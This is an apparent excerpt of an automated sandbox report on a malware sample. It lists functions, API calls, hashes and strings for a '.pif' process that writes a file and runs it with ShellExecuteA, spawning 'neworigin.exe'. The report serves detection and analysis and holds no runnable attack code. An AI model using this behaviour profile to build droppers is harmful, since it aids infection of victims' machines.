Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

Analysis Process: lxsyrsiW.pifPID: 1120, Parent PID: 348COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401411, 00401414
D`:vD`:v, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Non-executed Functions

Function 004015D7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

Analysis Process: neworigin.exePID: 6564, Parent PID: 1120COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	182
Total number of Limit Nodes:	23

Executed Functions

Function 06573178 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06573877
$]q, xrefs: 065738A0
$]q, xrefs: 065738AC
$]q, xrefs: 065738D0
$]q, xrefs: 065738C4
$]q, xrefs: 06573883

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: d6fa118fcbb4f876624e2c08b9417b6be7ac6ed530ac35d4a17a2522a474eb51
Instruction ID: 7f9f3e810d943b1b9efc1d2ee67a1bcae5bb68a36d3b418eb814c61d587ae58f
Opcode Fuzzy Hash: d6fa118fcbb4f876624e2c08b9417b6be7ac6ed530ac35d4a17a2522a474eb51
Instruction Fuzzy Hash: BE322E31E1061A8FCB55EF74D89459DB7B2FFC9310F20C66AD449AB264EF30A985CB80

Function 06577E78 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06578413
$]q, xrefs: 0657841F

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: dba7b5f06191b8f6eaaab2c3a11bc59ddc9f096ed212c2b23b4e42dbb906f807
Instruction ID: 47e091d39ec94592cba5c5362af07758b5bce2fa6e6f4962f8d82adac9788487
Opcode Fuzzy Hash: dba7b5f06191b8f6eaaab2c3a11bc59ddc9f096ed212c2b23b4e42dbb906f807
Instruction Fuzzy Hash: 06029F30B002059FDB54EF68E894AAEB7E6FF84314F148929D419DB395DB74EC86CB81

Function 06572350 Relevance: 1.1, Instructions: 1056COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35462812a26b1d7a3af7840c6b74158c27f28aaa05323936c1f5af4bc811bdb8
Instruction ID: df077322d343c9aad634fdd75073b5c3a0b23a966a4e201835323e875f77b1e2
Opcode Fuzzy Hash: 35462812a26b1d7a3af7840c6b74158c27f28aaa05323936c1f5af4bc811bdb8
Instruction Fuzzy Hash: E1A21334A002088FDBA4DF68D584B9DB7F2FB49314F5584A9E409AB366DB35EE85CF40

Function 065766E8 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e33bf19b1b6e85eeefccfb855e3a0ca6283ae32e7fcb68969fa1f650cb828
Instruction ID: 8f48f965028daf3108a5ba66f15ec2a94e1cd408a8f5398103addf1d7a0570a3
Opcode Fuzzy Hash: 256e33bf19b1b6e85eeefccfb855e3a0ca6283ae32e7fcb68969fa1f650cb828
Instruction Fuzzy Hash: E0629D34A006058FDB54DF68E594AAEB7F2FF88314F148469E809EB395DB35ED46CB80

Function 0657C2A0 Relevance: .6, Instructions: 639COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df2730f693b6c7dd9284dbd256004397f94bf1715cf7df8ee58d498692951875
Instruction ID: 407a960fe2f62dc971183a87e2aa1aa04d56479a0677e8bd48d38a5522710eb1
Opcode Fuzzy Hash: df2730f693b6c7dd9284dbd256004397f94bf1715cf7df8ee58d498692951875
Instruction Fuzzy Hash: F1328234B002099FDB54EF68E980BADB7B6FB88310F108529D905EB355DB35ED46CB91

Function 065756B8 Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203f1ba3ab7b0c84e27bd340e9bd8cadde11c3ca809270283af8529d2f0f9cbf
Instruction ID: 35108315feb9751235c2f2ac1200e45b1890441e145ff7246b57e70d0076559f
Opcode Fuzzy Hash: 203f1ba3ab7b0c84e27bd340e9bd8cadde11c3ca809270283af8529d2f0f9cbf
Instruction Fuzzy Hash: D812D235E002159FDB64DF64E88066EB7B2FF84310F248829D95A9B385EF34DD46CB91

Function 0657B32A Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a102ef3738d8fd8357580cf09ad41130142b21bb7d981170149bcfa3363f0ca
Instruction ID: 302431ee40533f8911a287d63b905c2abd5b4bf1dfb7c5bff97c045f1af08495
Opcode Fuzzy Hash: 4a102ef3738d8fd8357580cf09ad41130142b21bb7d981170149bcfa3363f0ca
Instruction Fuzzy Hash: 1A226D70E002099FDF64DF68E5807AEB7B6FB45310F208926E819EB395DA34DC85CB91

Function 0657ADD0 Relevance: 12.9, Strings: 10, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0657AF9C
$]q, xrefs: 0657AEF1
XM, xrefs: 0657B270
$]q, xrefs: 0657AF73
$]q, xrefs: 0657AF44
$]q, xrefs: 0657AFA8
$]q, xrefs: 0657AEFD
$]q, xrefs: 0657AF50
$]q, xrefs: 0657AF7F
XM, xrefs: 0657B18F

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: XM$XM$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1012131581
Opcode ID: 032ee7f6036150cae7e5a54863c07e0b48232f967e84095ef2a5def938ea6e93
Instruction ID: e0adf0429f40872c4ae5c2753c282d7b1fbbe0350ef143cd9b6e13fc9135c66c
Opcode Fuzzy Hash: 032ee7f6036150cae7e5a54863c07e0b48232f967e84095ef2a5def938ea6e93
Instruction Fuzzy Hash: A8E17030E002098FDB69DF69E5906AEB7B6FF85304F108929D805EB355DB34D846CB91

Function 0657B760 Relevance: 8.0, Strings: 6, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0657BCC5
$]q, xrefs: 0657BCED
$]q, xrefs: 0657BD21
$]q, xrefs: 0657BCB9
$]q, xrefs: 0657BD2D
$]q, xrefs: 0657BCF9

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: fa3dff54cfc0c535accafa1681d62575d4f4c48d14c1d073297e486b53a09b7d
Instruction ID: 50bac413433185bb0a2ca9b9f9508b9c89b1408d65e3f40155fd82938d719fe7
Opcode Fuzzy Hash: fa3dff54cfc0c535accafa1681d62575d4f4c48d14c1d073297e486b53a09b7d
Instruction Fuzzy Hash: 8C026D30E0020A8FDFA4DF68E580AADB7B6FF45310F10892AE419DB255DB75ED85CB91

Function 06579250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06579297
$]q, xrefs: 065792A3
$]q, xrefs: 065792DE
$]q, xrefs: 065792D2

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: c2f4c3baac863c21476c5175c719a3db71c8460fe5aed18d85b6841aaa0c8d59
Instruction ID: 68f05221db973d1112fe5cc7e2ebb2f91adbdcad98327860ab14a9129dab2c58
Opcode Fuzzy Hash: c2f4c3baac863c21476c5175c719a3db71c8460fe5aed18d85b6841aaa0c8d59
Instruction Fuzzy Hash: 76914130B0421A8FDB54EF65D950BAEB3F6BF85204F108569C80DEB385EF709D468BA1

Function 0657D060 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0657D46B
$]q, xrefs: 0657D457
$]q, xrefs: 0657D45F

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 0fcff9239bbbac8cc0d3a2e56e4c1d8e2f7114eb19b8920828e7553fd420fcc8
Instruction ID: 4cbb39bc363d2ac13e31923031c4e743dcc594e0375190264d4305064261b5d6
Opcode Fuzzy Hash: 0fcff9239bbbac8cc0d3a2e56e4c1d8e2f7114eb19b8920828e7553fd420fcc8
Instruction Fuzzy Hash: 14625130A0021A8FCB55EF68E580A5DB7F6FF85344B10CA68D4099F369DB75ED4ACB81

Function 06574C88 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fbq, xrefs: 06574CB3
XPbq, xrefs: 06574DD9
\Obq, xrefs: 06574E63

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq
API String ID: 0-4057264190
Opcode ID: 75ec4977ec11370d9cd61cae0ea358e58da29c8c8054708dd93bb6a013738f0d
Instruction ID: e33463ce61a928c1fe3d8d41de9048a016cfa50530a64de4f6a55728889ce7f9
Opcode Fuzzy Hash: 75ec4977ec11370d9cd61cae0ea358e58da29c8c8054708dd93bb6a013738f0d
Instruction Fuzzy Hash: 41618130F002199FEB55DFA4D8547AEBAF6FB88310F208429E50AAB395DB754C458F91

Function 06579241 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06579297
$]q, xrefs: 065792D2

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 8ffc1f95bd15e542ff38619e4fb9fe768b58ed540ca6eb9e6fab7a2b269923b2
Instruction ID: ea85cbc20400aeeedf14176e02d16ad737a23104f01b0abb0af048065700f0aa
Opcode Fuzzy Hash: 8ffc1f95bd15e542ff38619e4fb9fe768b58ed540ca6eb9e6fab7a2b269923b2
Instruction Fuzzy Hash: 02516F30B041169FDB55EB74E951BAEB7F6BB84204F108569C809EB395EB309C46CBA2

Function 06574C78 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fbq, xrefs: 06574CB3
XPbq, xrefs: 06574DD9

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: fbq$XPbq
API String ID: 0-2292610095
Opcode ID: 6d816165cd41c59b40249969161c727ec7b3a160cc3a300530cb10f1eaa58d33
Instruction ID: 8004a1958b07c6d28a62e727058cc5c9f3cb94ed50553a45319b75d1a31c70ce
Opcode Fuzzy Hash: 6d816165cd41c59b40249969161c727ec7b3a160cc3a300530cb10f1eaa58d33
Instruction Fuzzy Hash: 7C517130F002099FDB55DFB5C854BAEBBF6FF88710F208529E50AAB395DA749C058B91

Function 00EFEF18 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e3e4109fd12b38b3fa0956ec7a352abf5cb4b9ff5eb79978c1ae5ade3e2f79
Instruction ID: f84f3f2e74777f1106459af801f68db702fee0e8868ad48b0143b4004290f9e2
Opcode Fuzzy Hash: 85e3e4109fd12b38b3fa0956ec7a352abf5cb4b9ff5eb79978c1ae5ade3e2f79
Instruction Fuzzy Hash: 91412272E003598BCB14DF79D8006EEBBF5EF89310F05856AD508A7251DB78A885CBE0

Function 00EFE680 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00EFEF6A), ref: 00EFF057

Memory Dump Source

Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 9b011f2fa3a0ee33623a08569408b5e0431689f4c7e38968c0d06463bb8d01f3
Instruction ID: 93a6d8bd0a4241473d3ffa236e9381b4d13f037a42811020755b5a056af332aa
Opcode Fuzzy Hash: 9b011f2fa3a0ee33623a08569408b5e0431689f4c7e38968c0d06463bb8d01f3
Instruction Fuzzy Hash: AB1100B1C0065A9BCB10DF9AC544BAEFBF4EF48320F14856AE918B7241D778A940CFE5

Function 00EFEFE8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00EFEF6A), ref: 00EFF057

Memory Dump Source

Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0f5673f6c20d0005dd9b2bdd43e2f2c1052474fe65a656929616c71a47e0611f
Instruction ID: a44e87da95d543dd480227a44cbd9dba0b5bc471f2f4481f97cd7b5b90128035
Opcode Fuzzy Hash: 0f5673f6c20d0005dd9b2bdd43e2f2c1052474fe65a656929616c71a47e0611f
Instruction Fuzzy Hash: 8E1103B1C0065A9FCB10CFAAD545BEEFBB4EF48310F14856AE818B7240D778A940CFA1

Function 0657DBD5 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0657DD31

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 94b29d928973a4ea6d588e0addd96b3521c83954ca9610d7e4a1f6ae22584b1e
Instruction ID: a405edea9c1fb60bafebf02d9dbc7883e53ad03a732966717a9d77d1515e77ac
Opcode Fuzzy Hash: 94b29d928973a4ea6d588e0addd96b3521c83954ca9610d7e4a1f6ae22584b1e
Instruction Fuzzy Hash: 5E41C270E0034ADFDB51DF65E850A9EBBB6FF85340F104A29D805EB240DBB1E946CB91

Function 065721D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH]q, xrefs: 06572313

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: afd7fdaffad2446b50a898ad5b20782120966c98f5825e6c6c5d3f8c51a2a2fb
Instruction ID: 8ad4ba67d157d826f051045b1c81f8f56bca09dd116e5f6c622bbcda16647fe4
Opcode Fuzzy Hash: afd7fdaffad2446b50a898ad5b20782120966c98f5825e6c6c5d3f8c51a2a2fb
Instruction Fuzzy Hash: 6E31E430B102058FDB49AB74E95466E77E7BF89210F204938D40AEB394DF35DE46CB95

Function 065783C8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$]q, xrefs: 06578413

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 4c6dcd3fda8d531586acbb64c624df4121957e0bed2db704c4dc51a5ed9dbacd
Instruction ID: d8d40510930edc6c6a69f418ea00d401a6e1b96d3e4dc64e41b05d41fa04bec4
Opcode Fuzzy Hash: 4c6dcd3fda8d531586acbb64c624df4121957e0bed2db704c4dc51a5ed9dbacd
Instruction Fuzzy Hash: 97F0F431F042009FDFA49E48F98866873AAFB40218F044876D948CB280D7B1D905DB40

Function 065762E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58d9e61b9a35c9623c35c4c6c5f8cd740fddf12c962bfbf4871eb1ff1157ace
Instruction ID: 9f4d2f2b70f5a6c7cf13121c35286d3b3e192bb3d3d60a7f7397e0d043c62441
Opcode Fuzzy Hash: d58d9e61b9a35c9623c35c4c6c5f8cd740fddf12c962bfbf4871eb1ff1157ace
Instruction Fuzzy Hash: CC61D071F004114FDB54AA7AD88056FBADBAF94220B154479D80EDB364EE75DD028BD2

Function 065743B9 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03f2611b632f500fdfaa166cec8eec8788d267f001746d10093b02f4f06368e
